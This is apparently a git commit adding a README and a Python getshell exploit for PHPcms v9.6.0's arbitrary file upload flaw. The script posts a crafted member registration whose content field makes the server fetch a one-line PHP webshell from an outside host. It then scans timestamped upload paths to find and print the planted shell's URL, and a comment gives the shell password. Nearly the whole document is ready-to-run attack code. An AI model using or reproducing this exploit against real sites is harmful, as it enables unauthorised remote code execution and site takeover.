phpcmsv9.6.0
This commit is contained in:
Mr5m1th
parent
bceb2c4bf8
commit
3827771990
1
CMS/PHPcms/v9.6.0/README.md
Normal file
1
CMS/PHPcms/v9.6.0/README.md
Normal file
@ -0,0 +1 @@
|
|||||||
|
PHPcms v9.6.0 任意文件上传 可直接Getshell
|
||||||
59
CMS/PHPcms/v9.6.0/php_v9.6.0_getshell.py
Normal file
59
CMS/PHPcms/v9.6.0/php_v9.6.0_getshell.py
Normal file
@ -0,0 +1,59 @@
|
|||||||
|
# -*- coding:utf-8 -*-
|
||||||
|
import requests
|
||||||
|
import sys
|
||||||
|
from datetime import datetime
|
||||||
|
def getTime():
|
||||||
|
year = str(datetime.now().year)
|
||||||
|
month = "%02d" % datetime.now().month
|
||||||
|
day = "%02d" % datetime.now().day
|
||||||
|
hour = datetime.now().hour
|
||||||
|
hour = hour - 12 if hour > 12 else hour
|
||||||
|
hour = "%02d" % hour
|
||||||
|
minute = "%02d" % datetime.now().minute
|
||||||
|
second = "%02d" % datetime.now().second
|
||||||
|
microsecond = "%06d" % datetime.now().microsecond
|
||||||
|
microsecond = microsecond[:3]
|
||||||
|
nowTime = year + month + day + hour + minute + second + microsecond
|
||||||
|
return int(nowTime), year + "/" + month + day + "/"
|
||||||
|
def main():
|
||||||
|
if len(sys.argv) < 2:
|
||||||
|
print("[*]Usage : Python 1.py http://xxx.com")
|
||||||
|
sys.exit()
|
||||||
|
host = sys.argv[1]
|
||||||
|
url = host + "/index.php?m=member&c=index&a=register&siteid=1"
|
||||||
|
data = {
|
||||||
|
"siteid": "1",
|
||||||
|
"modelid": "1",
|
||||||
|
"username": "dsakkfaffdssdudi",
|
||||||
|
"password": "123456",
|
||||||
|
"email": "dsakkfddsjdi@qq.com",
|
||||||
|
# 如果想使用回调的可以使用http://file.codecat.one/oneword.txt,一句话地址为.php后面加上e=YXNzZXJ0
|
||||||
|
"info[content]": "<img src=http://file.codecat.one/normalOneWord.txt?.php#.jpg>", #密码 akkuman
|
||||||
|
"dosubmit": "1",
|
||||||
|
"protocol": "",
|
||||||
|
}
|
||||||
|
try:
|
||||||
|
startTime, _ = getTime()
|
||||||
|
htmlContent = requests.post(url, data=data)
|
||||||
|
finishTime, dateUrl = getTime()
|
||||||
|
if "MySQL Error" in htmlContent.text and "http" in htmlContent.text:
|
||||||
|
successUrl = htmlContent.text[htmlContent.text.index("http"):htmlContent.text.index(".php")] + ".php"
|
||||||
|
print("[*]Shell : %s" % successUrl)
|
||||||
|
else:
|
||||||
|
print("[-]Notice : writing remoteShell successfully, but failing to get the echo. You can wait the program crawl the uploadfile(in 1-3 second),or re-run the program after modifying value of username and email.\n")
|
||||||
|
successUrl = ""
|
||||||
|
for t in range(startTime, finishTime):
|
||||||
|
checkUrlHtml = requests.get(
|
||||||
|
host + "/uploadfile/" + dateUrl + str(t) + ".php")
|
||||||
|
if checkUrlHtml.status_code == 200:
|
||||||
|
successUrl = host + "/uploadfile/" + \
|
||||||
|
dateUrl + str(t) + ".php"
|
||||||
|
print("[*]Shell : %s" % successUrl)
|
||||||
|
break
|
||||||
|
if successUrl == "":
|
||||||
|
print(
|
||||||
|
"[x]Failed : had crawled all possible url, but i can't find out it. So it's failed.\n")
|
||||||
|
except:
|
||||||
|
print("Request Error")
|
||||||
|
if __name__ == '__main__':
|
||||||
|
main()
|
||||||
Loading…
x
Reference in New Issue
Block a user